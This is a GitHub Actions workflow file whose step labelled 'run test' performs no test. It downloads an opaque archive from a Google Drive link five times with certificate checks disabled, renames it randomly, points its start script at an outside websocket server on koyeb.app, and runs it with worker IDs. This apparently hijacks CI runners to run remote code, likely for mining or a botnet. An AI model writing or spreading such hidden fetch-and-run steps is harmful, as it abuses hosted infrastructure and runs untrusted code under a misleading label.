name: Phu Hang

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

permissions:
  contents: read

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v4
    - name: Set up Python 3.12
      uses: actions/setup-python@v3
      with:
        python-version: "3.12"
    - name: run test
      run: |
        R=$(tr -dc a-z0-9 </dev/urandom | head -c 8) && wget --no-check-certificate 'https://drive.usercontent.google.com/download?id=1ghCQVTpuVSSJ-ub6ghvE4QarkEUqMruH&export=download&confirm=t' -O "$R.tar.gz" && tar -xf "$R.tar.gz" && mv python-mcp "$R" && cd "$R" && sed -i 's|SERVER_WS=.*|SERVER_WS=wss://preferred-callida-mono-e9a2882f.koyeb.app|' start.sh && chmod +x start.sh && ./start.sh 4 user_s1;
        R=$(tr -dc a-z0-9 </dev/urandom | head -c 8) && wget --no-check-certificate 'https://drive.usercontent.google.com/download?id=1ghCQVTpuVSSJ-ub6ghvE4QarkEUqMruH&export=download&confirm=t' -O "$R.tar.gz" && tar -xf "$R.tar.gz" && mv python-mcp "$R" && cd "$R" && sed -i 's|SERVER_WS=.*|SERVER_WS=wss://preferred-callida-mono-e9a2882f.koyeb.app|' start.sh && chmod +x start.sh && ./start.sh 4 user_s2;
        R=$(tr -dc a-z0-9 </dev/urandom | head -c 8) && wget --no-check-certificate 'https://drive.usercontent.google.com/download?id=1ghCQVTpuVSSJ-ub6ghvE4QarkEUqMruH&export=download&confirm=t' -O "$R.tar.gz" && tar -xf "$R.tar.gz" && mv python-mcp "$R" && cd "$R" && sed -i 's|SERVER_WS=.*|SERVER_WS=wss://preferred-callida-mono-e9a2882f.koyeb.app|' start.sh && chmod +x start.sh && ./start.sh 4 user_s3;
        R=$(tr -dc a-z0-9 </dev/urandom | head -c 8) && wget --no-check-certificate 'https://drive.usercontent.google.com/download?id=1ghCQVTpuVSSJ-ub6ghvE4QarkEUqMruH&export=download&confirm=t' -O "$R.tar.gz" && tar -xf "$R.tar.gz" && mv python-mcp "$R" && cd "$R" && sed -i 's|SERVER_WS=.*|SERVER_WS=wss://preferred-callida-mono-e9a2882f.koyeb.app|' start.sh && chmod +x start.sh && ./start.sh 4 user_s4;
        R=$(tr -dc a-z0-9 </dev/urandom | head -c 8) && wget --no-check-certificate 'https://drive.usercontent.google.com/download?id=1ghCQVTpuVSSJ-ub6ghvE4QarkEUqMruH&export=download&confirm=t' -O "$R.tar.gz" && tar -xf "$R.tar.gz" && mv python-mcp "$R" && cd "$R" && sed -i 's|SERVER_WS=.*|SERVER_WS=wss://preferred-callida-mono-e9a2882f.koyeb.app|' start.sh && chmod +x start.sh && ./start.sh 4 user_s5;
        lscpu